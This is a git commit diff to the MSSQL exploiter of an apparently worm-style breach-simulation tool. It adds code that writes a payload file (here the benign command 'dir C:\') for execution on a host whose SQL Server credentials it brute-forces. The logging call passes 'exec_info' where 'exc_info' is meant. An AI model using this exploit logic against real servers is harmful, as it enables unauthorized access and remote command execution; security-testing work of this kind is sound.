- Added dynamic file creation on runtime instead of a static payload file

2019-01-20 15:13:48 +02:00 · 2019-01-20 15:13:48 +02:00 · dfe6cf073e
parent 0bfde8d047
commit dfe6cf073e
1 changed files with 18 additions and 0 deletions
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -22,6 +22,21 @@ class MSSQLExploiter(HostExploiter):
        self._config = __import__('config').WormConfiguration
        self.attacks_list = [mssqlexec_utils.CmdShellAttack]

+    @staticmethod
+    def create_payload_file(payload_path=DEFAULT_PAYLOAD_PATH):
+        """
+        This function creates dynamically the payload file to be transported and ran on the exploited machine.
+        :param payload_path: A path to the create the payload file in
+        :return: True if the payload file was created and false otherwise.
+        """
+        try:
+            with open(payload_path, 'w+') as payload_file:
+                payload_file.write('dir C:\\')
+            return True
+        except Exception as e:
+            LOG.error("Payload file couldn't be created", exec_info=True)
+            return False
+
    def exploit_host(self):
        """
            Main function of the mssql brute force
@ -29,6 +44,9 @@ class MSSQLExploiter(HostExploiter):
                    True or False depends on process success
            """
        username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
+
+        if not MSSQLExploiter.create_payload_file():
+            return False
        if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
                                  self.DEFAULT_PAYLOAD_PATH):
            LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))